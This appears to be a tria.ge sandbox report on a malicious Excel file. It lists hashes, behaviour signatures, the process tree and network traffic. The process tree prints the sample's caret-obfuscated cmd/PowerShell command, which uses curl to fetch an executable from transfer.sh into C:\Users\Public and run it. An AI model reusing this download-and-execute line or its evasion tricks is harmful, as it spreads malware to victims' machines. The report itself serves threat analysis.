Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2023, 23:54 UTC
Behavioral task
behavioral1
Sample
bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls
Resource
win10v2004-20230915-en
General
-
Target
bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls
-
Size
100KB
-
MD5
5014be5bf154ed9bbfe3b5868ad702d1
-
SHA1
1ccadf970129812badcb86515d286ff1d6dd5200
-
SHA256
bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5
-
SHA512
486ae1acfb7c80b279dcdcf254d4e797ed6e7d146f2de5634584e4d995944ab6923ab747733bea85ae0bb39fa1be468e5f74cb9fd010e09a69c59279bbeed3a2
-
SSDEEP
3072:5rxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAQtJE2zuxq+fr9wBLa71ba2ryLTHeYE:BxEtjPOtioVjDGUU1qfDlavx+W2QnAsF
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2904 3244 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 52 3204 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3244 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3204 powershell.exe 3204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3204 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3244 wrote to memory of 2904 3244 EXCEL.EXE 89 PID 3244 wrote to memory of 2904 3244 EXCEL.EXE 89 PID 2904 wrote to memory of 3204 2904 cmd.exe 91 PID 2904 wrote to memory of 3204 2904 cmd.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bc127ab9ae2605214e214b69cda0597477f8bc4b903d5215dd9e221cda0991b5.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SYSTEM32\cmd.execmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/JWNONUaUMt/Egrome.e^xe -o C:\Users\Public\z3usy.exe;C:\Users\Public\z3usy.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /W 01 curl https://transfer.sh/get/JWNONUaUMt/Egrome.exe -o C:\Users\Public\z3usy.exe;C:\Users\Public\z3usy.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request46.28.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request133.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.109.26.67.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request54.120.234.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.173.189.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request134.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.81.57.23.in-addr.arpaIN PTRResponse29.81.57.23.in-addr.arpaIN PTRa23-57-81-29deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
Remote address:144.76.136.153:443RequestGET /get/JWNONUaUMt/Egrome.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: transfer.sh
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Retry-After: Fri, 13 Oct 2023 00:45:12 GMT
Server: Transfer.sh HTTP Server
X-Content-Type-Options: nosniff
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1697150712
X-Served-By: Proudly served by DutchCoders
Date: Thu, 12 Oct 2023 22:45:06 GMT
Content-Length: 10
-
Remote address:8.8.8.8:53Request153.136.76.144.in-addr.arpaIN PTRResponse153.136.76.144.in-addr.arpaIN PTRtransfersh
-
Remote address:8.8.8.8:53Request208.194.73.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.202.248.87.in-addr.arpaIN PTRResponse1.202.248.87.in-addr.arpaIN PTRhttps-87-248-202-1amsllnwnet
-
Remote address:8.8.8.8:53Request13.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request146.78.124.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request158.240.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request169.117.168.52.in-addr.arpaIN PTRResponse
-
878 B 4.9kB 9 7
HTTP Request
GET https://transfer.sh/get/JWNONUaUMt/Egrome.exeHTTP Response
404
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
46.28.109.52.in-addr.arpa
-
360 B 5
DNS Request
11.227.111.52.in-addr.arpa
DNS Request
11.227.111.52.in-addr.arpa
DNS Request
11.227.111.52.in-addr.arpa
DNS Request
11.227.111.52.in-addr.arpa
DNS Request
11.227.111.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
133.32.126.40.in-addr.arpa
-
72 B 126 B 1 1
DNS Request
254.109.26.67.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
54.120.234.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.173.189.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
134.32.126.40.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
29.81.57.23.in-addr.arpa
-
57 B 73 B 1 1
DNS Request
transfer.sh
DNS Response
144.76.136.153
-
73 B 98 B 1 1
DNS Request
153.136.76.144.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
208.194.73.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
56.126.166.20.in-addr.arpa
-
71 B 116 B 1 1
DNS Request
1.202.248.87.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
13.227.111.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
146.78.124.51.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
158.240.127.40.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
169.117.168.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82